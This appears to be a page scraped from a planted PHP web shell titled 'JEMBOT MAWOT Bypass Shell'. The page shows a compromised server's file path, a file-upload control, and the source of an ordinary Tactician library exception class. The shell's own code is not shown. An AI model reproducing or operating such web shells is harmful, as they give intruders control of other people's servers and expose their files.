JEMBOT MAWOT Bypass Shell

Current Path : /home/cinepatreb/billetterie/vendor/league/tactician/src/Exception/
Upload File :
Current File : /home/cinepatreb/billetterie/vendor/league/tactician/src/Exception/MissingHandlerException.php

<?php

namespace League\Tactician\Exception;

/**
 * No handler could be found for the given command.
 */
class MissingHandlerException extends \OutOfBoundsException implements Exception
{
    /**
     * @var string
     */
    private $commandName;

    /**
     * @param string $commandName
     *
     * @return static
     */
    public static function forCommand($commandName)
    {
        $exception = new static('Missing handler for command ' . $commandName);
        $exception->commandName = $commandName;

        return $exception;
    }

    /**
     * @return string
     */
    public function getCommandName()
    {
        return $this->commandName;
    }
}

xxxxx1.0, XXX xxxx